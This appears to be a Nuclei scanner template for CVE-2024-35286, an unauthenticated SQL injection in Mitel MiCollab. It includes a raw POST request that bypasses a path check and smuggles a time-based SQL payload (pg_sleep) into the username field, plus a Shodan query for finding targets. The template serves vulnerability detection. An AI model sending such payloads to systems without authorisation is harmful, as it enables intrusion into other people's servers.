id: CVE-2024-35286 info: name: Mitel MiCollab <= 9.8.0.33 - SQL Injection author: daffainfo severity: critical description: | A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations. impact: | Unauthenticated attackers can execute arbitrary SQL queries to access sensitive information and execute arbitrary database and management operations. remediation: | Update Mitel MiCollab to a version later than 9.8.0.33. reference: - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014 - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-35286 epss-score: 0.59959 epss-percentile: 0.98297 cwe-id: CWE-89 cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: mitel product: micollab shodan-query: html:"Mitel" html:"MiCollab" tags: cve,cve2024,mitel,micollab,sqli,vkev,vuln http: - raw: - | @timeout: 20s POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded subAction=basicLogin&username=test'||pg_sleep(6)--&password=test&clusterIndex=0 matchers: - type: dsl dsl: - 'duration >= 6' - 'status_code == 500' - 'contains_any(body, "com.mitel.npm.web.console", "java.lang.NullPointerException")' - 'contains(set_cookie, "JSESSIONID=")' condition: and # digest: 490a00463044022010a5bb0d28992328c6cc1a61fbf27419f0812c9ec4e98c1da764aa0d20c6edb1022077403be83f12f32f659fc78116df2fc6d94c99fedba43b8c77330083a79b5f8c:922c64590222798bb761d5b6d8e72950